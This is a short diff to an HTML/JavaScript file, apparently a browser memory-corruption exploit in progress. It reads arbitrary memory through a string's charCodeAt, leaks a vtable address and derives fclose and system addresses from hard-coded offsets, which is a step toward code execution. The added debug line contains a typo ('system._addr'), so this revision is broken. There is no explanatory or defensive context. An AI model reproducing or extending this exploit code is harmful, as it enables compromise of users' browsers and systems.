--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start69");
+alert("start9");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -145,7 +145,10 @@ var func_addr=(s1.charCodeAt(a+5)<<16)+s1.charCodeAt(a+4);
 //alert(func_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-//alert(vftable.toString(16));
+a=(vftable+0xF4E4C)/2;
+var fclose_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
+var system_addr=fclose_addr-0x1B040;
+alert(system._addr.toString(16));
 a=(func_addr+0x30)/2;
 var p_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 a=(p_addr+0x10)/2;
